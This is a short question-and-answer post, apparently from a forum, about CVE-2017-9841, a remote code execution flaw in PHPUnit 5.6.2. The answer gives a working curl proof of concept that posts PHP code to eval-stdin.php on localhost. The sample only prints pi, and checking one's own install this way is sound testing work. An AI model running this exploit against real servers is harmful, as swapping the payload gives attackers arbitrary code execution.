How can I exploit CVE-2017-9841 RCE vulnerability in PHPUnit?

Question

Lets I've installed PHPUnit version is 5.6.2. Which is vulnerable to Remote Code Execution. How can I check this vulnerability?

Answer 1

Let's you have that vulnerable PHPUnit in http://localhost/vendor/phpunit/.

So you can check by printing the value of pi using this cURL command.

$ curl --data "<?php echo(pi());" http://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php